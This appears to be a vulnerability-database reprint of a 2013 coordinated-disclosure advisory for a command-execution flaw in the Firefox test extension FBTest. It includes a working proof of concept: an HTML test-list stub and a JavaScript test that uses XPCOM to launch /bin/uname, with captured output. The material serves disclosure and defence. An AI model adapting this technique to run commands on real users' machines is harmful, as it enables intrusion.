Lucene search
K

Firefox FBTest 1.12b4 Command Execution

🗓️ 03 Dec 2013 00:00:00Reported by AKAT-1Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

The Firefox extension FBTest version =< 1.12b4 allows RCE on a Linux host, enabling JavaScript code to call Mozilla components using XPCOM framework

Code
`General info:  
=============  
The Firefox extension FBTest (http://getfirebug.com/wiki/index.php/FBTest) version =< 1.12b4 allows RCE on a host running tests.  
This was only tested on Linux. If the user running FBTest would point extension to the URL containing malicious test cases (intentionally or by being lurked),  
then JavaScript code can freely call Mozilla components using XPCOM framework. Some may say it's a feature and this is how extensions generally work. OK, cool.  
  
Important notice:  
=================  
1) It should be crystal clear the FBTest is not part of Firebug.  
2) It should be clear that FBTest is not distributed with Firebug.  
3) It should be clear Firebug users are not affected in any way by any bugs in FBTest.  
4) FBTest is just a helper extension primarily used by Firebug Working Group for testing Firebug.  
  
Thanks to Firebug team and especially to Jan (Honza) Odvarko for help in coordinated disclosure of this advisory.  
  
Running PoC:  
============  
-- cut --  
[New Thread 0xe36ffb70 (LWP 22040)]  
[New Thread 0xe2efeb70 (LWP 22041)]  
[New Thread 0xe26fdb70 (LWP 22042)]  
Linux box 3.2.6 #1 SMP Wed Feb 6 01:19:11 GMT 2013 x86_64 GNU/Linux  
[Thread 0xed82db70 (LWP 22027) exited]  
[Thread 0xe54ffb70 (LWP 22038) exited]  
[Thread 0xeb4ffb70 (LWP 22030) exited]  
-- cut --  
  
FBTest stub:  
============  
-- cut  
<!DOCTYPE html>  
<html>  
<head>  
<!-- XXX: point these to https://getfirebug.com/tests/head/firebug.html -->  
<link rel="stylesheet" href="./testConsole.css" type="text/css"/>  
<link rel="stylesheet" href="./testList.css" type="text/css"/>  
<link rel="stylesheet" href="./testResult.css" type="text/css"/>  
<link rel="stylesheet" href="./tabView.css" type="text/css"/>  
<script type="text/javascript" src="./testListUtils.js"></script>  
</head>  
  
<body>  
<script type="text/javascript">  
var driverBaseURI = getDriverBaseURI();  
var serverURI = driverBaseURI;  
  
var testList = [  
{group: "foo", uri: "poc.js", desc: "bar" },  
]  
</script>  
<div id="tests"></div>  
  
</body>  
</html>  
-- cut  
  
RCE testcase:  
=============  
-- cut  
function runTest() {  
try {  
main();  
FBTest.clearCache();  
}  
catch (err) {  
FBTest.exception("Exception occured: ", err);  
}  
finally {  
FBTest.testDone();  
}  
}  
  
function main()  
{  
try { cmd(); FBTest.clearCache(); } catch (e) { ; }  
}  
  
function cmd() {  
try {  
var f = Components.classes["@mozilla.org/file/local;1"]  
.createInstance(Components.interfaces.nsILocalFile);  
} catch (e) { alert(e); }  
  
f.initWithPath("/bin/uname");  
var p = Components.classes["@mozilla.org/process/util;1"]  
.createInstance(Components.interfaces.nsIProcess);  
p.init(f);  
  
const args = ["-a"];  
p.run(true, args, args.length);  
}  
-- cut  
  
Credits:  
========  
AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b  
  
____________________________________________________________  
FREE 3D EARTH SCREENSAVER - Watch the Earth right on your desktop!  
Check it out at http://www.inbox.com/earth  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Dec 2013 00:00Current
7.4High risk
Vulners AI Score7.4
31